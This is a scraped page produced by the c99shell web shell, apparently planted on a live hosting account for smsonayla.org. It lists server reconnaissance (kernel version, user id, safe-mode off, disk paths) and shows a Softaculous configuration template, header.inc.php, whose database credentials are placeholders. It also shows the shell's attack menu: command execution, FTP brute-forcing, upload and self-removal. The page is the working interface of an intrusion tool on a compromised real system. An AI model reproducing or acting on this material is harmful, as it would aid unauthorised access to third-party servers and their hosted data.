smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/var/softaculous/una/   drwxr-xr-x
Free 422.82 GB of 543.66 GB (77.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     header.inc.php (1.36 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

define
('BX_DOL'1);

define('BX_DOL_URL_ROOT''[[softurl]]/'); ///< site url

define('BX_DIRECTORY_PATH_ROOT''[[softpath]]/'); ///< site path

define('BX_DATABASE_HOST''[[softdbhost]]'); ///< db host
define('BX_DATABASE_SOCK'''); ///< db socket
define('BX_DATABASE_PORT'''); ///< db port
define('BX_DATABASE_USER''[[softdbuser]]'); ///< db user
define('BX_DATABASE_PASS''[[softdbpass]]'); ///< db password
define('BX_DATABASE_NAME''[[softdb]]'); ///< db name
define('BX_DATABASE_ENGINE''MYISAM'); ///< db engine

define('BX_SYSTEM_JAVA''java:'); ///< path to java binary
define('BX_SYSTEM_FFMPEG''[[softpath]]/plugins/ffmpeg/ffmpeg.exe'); ///< path to ffmpeg binary
define('BX_DOL_SECRET''[[secret]]'); ///< secret word

define('BX_DB_FULL_VISUAL_PROCESSING'true); ///< upon db error - show error message
define('BX_DB_FULL_DEBUG_MODE'false); ///< upon db error - show detailed report (turn off in production mode)
define('BX_DB_DO_EMAIL_ERROR_REPORT'true); ///< upon db error - send email with detailed report

error_reporting(E_ALL);
mb_internal_encoding('UTF-8');
mb_regex_encoding('UTF-8');
date_default_timezone_set('UTC');

require_once(
'params.inc.php');

bx_check_debug_mode();
bx_check_maintenance_mode(true);
bx_check_minimal_requirements(true);
bx_check_redirect_to_correct_hostname(true);
bx_check_redirect_to_remove_install_folder(true);


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0042 ]--